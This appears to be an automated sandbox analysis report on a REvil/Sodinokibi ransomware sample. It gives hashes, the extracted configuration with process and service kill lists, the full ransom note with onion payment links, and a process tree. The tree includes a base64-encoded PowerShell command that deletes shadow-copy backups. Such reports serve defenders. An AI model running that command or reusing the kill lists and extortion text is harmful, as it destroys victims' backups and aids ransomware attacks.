Analysis

  • max time kernel
    8s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted
    10-03-2024 09:28

General

  • Target

    2024-03-10_1b3264683cb611a24adb65249017ea03_revil.exe

  • Size

    123KB

  • MD5

    1b3264683cb611a24adb65249017ea03

  • SHA1

    3f2645e3810bd938646f836f042a2af24c71e255

  • SHA256

    a68e8e2dd24b67cd103191e8d520a81c828de70c2b7818f829151b670b4707ce

  • SHA512

    cda9f3fbe11ee299109e6150803fb7e14bfb16747c128ff484052194791e6be5ddcd8598916aed098160933f3347f5ef72680e53824a61ec0fc5661dc947282d

  • SSDEEP

    1536:7DvcP30ThpshwVs5OE8yNcZQp+2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOxg:yrSVhaNcZM8gnBR5uiV1UvQFOxg

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr

Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. 
From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\hyezd5590a-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension hyezd5590a. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/08247ED6F9754B0E 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/08247ED6F9754B0E Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: +NlJlaFMAnpDTQvb5tfseKTcikJJVPjJAPIS8BeBcuPrl4NlIBP2DiiSVFcsRAaV 7C8Qz5J+f8XhsLCfILxAZAgz9gFnY4Rp/ZQPIykDfxhYI3JgQe+P8bQlGX3AP+fc cEXZl2xTJsS65/JjxI4XxPsgJe/g2lnjGMzS076v1n7toKhK8Be2F9KuqXw6e0Zm T+Z8GFBaY3l0rmcVdW3zcvTYW3K1NUJHp897iwSrfcwi+63zZfRdU17T25uncQKC HIXQLGH9gxN6VI0UK1gLGWm0DNUqOExvR2pacMxAIoeNY8izXC9TXcHu2+BF3Ejd EaQM+bklqAEjdSXny3/OQp/KzHJEtIRPkGZIzyz0OuEfx0YUUdcIJG+WwTATxt+n PWL1wHeZY0nwoIyGOJPh2Sz6O0YpFiU5PlkAMU3SvFl85C6cmrJgyCi4mcUMagOm oAm06/5H2m/a8MqIYjeOk8rGdgc9my1SUH6kf7SEjyf0+HyDrY9XfC04rtlAFQCo +znzae187TQolOb8qx2Sjg8Tp2bxaA4ZZ/iKPgL+lKMN5ayHZj4GXY3uhjHZDXyX D4oHIx7tpXHOgdRvCpZ5T7N/yC4ev+kSb0/AFaLv2dCtK2/PF5SCXJMpLpH/w4c6 g1C8A6aQtU4KM4nkIY+jw10CRncHf1axiIvTGrpGG85zaKP4UVPSmnJwq7tpWySc 8WyiCtGGprQ2YEfPfozwXWIpbJZeflQB0TZ0hJDMJJVnMZjhFZAN6At/SoU2MWo8 CKA4Zu1tT7EOrp9SfZruI1itVGfTZ8HvFX/1CjvSHTKv9NiWerYVzv5Gm6SG/gFw aKv+ZjHogLroEv0FPZqoCiNMxyJCXmm3S0WGPl/HZRmXfQ5+enyLwzs1H2j4nfYs XxAWvbCQlKyx8t45MOnCbjfFydQdgIP6CwiCXBQMJFDqNtOwHelMLEYMubA/ZZvb tRFZorEM3K9zE9Ye2H22IUgfwbsaGdcpq9/Obha0jqaO0NyqdRoqoRLEkjQEFb6H jf4JJCsvCE9Hu6vVHJmTzSuZiTKnAvaNNIu9Qh65Xuvu/6yU6lQsrGJuZWUbNjCE r4gfsWnIinLVXW9LOUEtskMTnqd+Q4Kqw4GKG28nwkPb2B13r86LF/llsSlXj12o 3l9HqW19qC4JZAHRM8vOM/XjKAK8hIjh+/HhjNfQpM6k5jTav7OxwSyHVl9YFwJI 2v9B3zAyZARsLG0nAa4CSSNp/nN/zUfituoiqjt48kuY4JuCWCiEWLeki/e7w4Gy i5zYZdEnL9LH9rk8bo4QUD2oiptMJ613VhIwak8nJ4cLyeSzcH2I6w3zNKIBIiPD iaPMirQq7VaumNQsaQi8S8jVHyY6xbAkh/YHnp/YmuZLNtD5DDC2sg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/08247ED6F9754B0E

http://decryptor.cc/08247ED6F9754B0E

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-03-10_1b3264683cb611a24adb65249017ea03_revil.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-03-10_1b3264683cb611a24adb65249017ea03_revil.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2276
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3056
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2116
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1728

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

    • C:\Users\Admin\AppData\Local\Temp\Cab5BA9.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\Tar5CF8.tmp

      Filesize

      142KB

      MD5

      4db52e102b486727bc69386f88209a35

      SHA1

      cea5053dc66658cc824875cc915db88a0cbd6fb3

      SHA256

      7d0959377e7bd4243bef12563b3eb6e4e318d16e67e75062de13a0379051fa37

      SHA512

      49b2cb503c091ca28b6fdff9acc3cd0255cc7b5d72a70e77cc7a43a2b161a63feb444ca15b25882a08c20fdec95ee2ebb4a34c38c81bdf17d5e899b943faf07a

    • C:\Users\hyezd5590a-readme.txt

      Filesize

      6KB

      MD5

      71c196c19fd6d9e22765aef14766f65a

      SHA1

      48496d2f657b20c3ad839fc9cf8de0342071ea0a

      SHA256

      d656bee7838c3e512c441e9053eca7a697fc77359d514f76ba3d774c561500aa

      SHA512

      6cc8d70a3015e121e719f6cc011d66c433a2d4995ac200b97866d49cf22124801e2549b95cb8c531a0ebebc5aa25628b1e424c4e7db5edf352f7bf86500fd9e0

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      194KB

      MD5

      3db09c12acfad6b28c6b22f67f2d92e5

      SHA1

      7ae69929a0ceb1d6180e263df787e569ce252d41

      SHA256

      0ea5fadf6de10cbb6d61324154792a4c8b6405459f48336f14cd3e8622e15fb0

      SHA512

      560cfde9cd7ea467419a73011e65b21d469f6044dfd51d740b2ae2fc4450bd53b3a33b06705a13344f0cc39d73d04ff31ad3e3fdb1d762de4bf1a6672b0e5eac

    • memory/2276-18-0x0000000000D00000-0x0000000000D22000-memory.dmp

      Filesize

      136KB

    • memory/2276-0-0x0000000000D00000-0x0000000000D22000-memory.dmp

      Filesize

      136KB

    • memory/3056-7-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

      Filesize

      9.6MB

    • memory/3056-12-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

      Filesize

      9.6MB

    • memory/3056-11-0x0000000002B70000-0x0000000002BF0000-memory.dmp

      Filesize

      512KB

    • memory/3056-10-0x0000000002B70000-0x0000000002BF0000-memory.dmp

      Filesize

      512KB

    • memory/3056-9-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

      Filesize

      9.6MB

    • memory/3056-8-0x0000000002B70000-0x0000000002BF0000-memory.dmp

      Filesize

      512KB

    • memory/3056-6-0x0000000002860000-0x0000000002868000-memory.dmp

      Filesize

      32KB

    • memory/3056-5-0x000000001B570000-0x000000001B852000-memory.dmp

      Filesize

      2.9MB